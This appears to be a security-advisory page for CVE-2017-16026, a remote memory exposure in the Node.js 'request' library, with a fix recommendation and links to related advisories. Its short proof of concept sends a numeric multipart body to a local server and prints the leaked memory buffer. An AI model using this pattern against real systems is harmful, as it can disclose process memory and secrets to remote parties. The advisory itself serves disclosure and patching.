Lucene search
Feross AboukhadijehNODEJS:309HistoryFeb 01, 2017 - 11:21 p.m.
Remote Memory Exposure
2017-02-0123:21:46
Feross Aboukhadijeh
www.npmjs.com
58
0.002 Low
EPSS
Percentile
55.9%
Overview
Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.
Proof of Concept
var request = require('request');
var http = require('http');
var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);
request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
Recommendation
Update to version 2.68.0 or later
References
| CPE | Name | Operator | Version |
|---|---|---|---|
| request | ge | 2.2.6 <2.47.0 || >2.51.0 <=2.67.0 |
Related
ubuntucve
ubuntucve
CVE-2017-16026
2018-06-04 00:00:00
prion
prion
Cross site request forgery (csrf)
2018-06-04 19:29:00
nessus
nessus
RHEL 8 : nodejs-request (Unpatched Vulnerability)
2024-06-03 00:00:00
RHEL 8 : nodejs-request (Unpatched Vulnerability)
2024-05-11 00:00:00
debiancve
debiancve
CVE-2017-16026
2018-06-04 19:29:01
nvd
nvd
CVE-2017-16026
2018-06-04 19:29:01
osv
osv
Remote Memory Exposure in request
2018-11-09 17:44:01
CVE-2017-16026
2018-06-04 19:29:01
cve
cve
CVE-2017-16026
2018-06-04 19:29:01
cvelist
cvelist
CVE-2017-16026
2018-04-26 00:00:00
github
github
Remote Memory Exposure in request
2018-11-09 17:44:01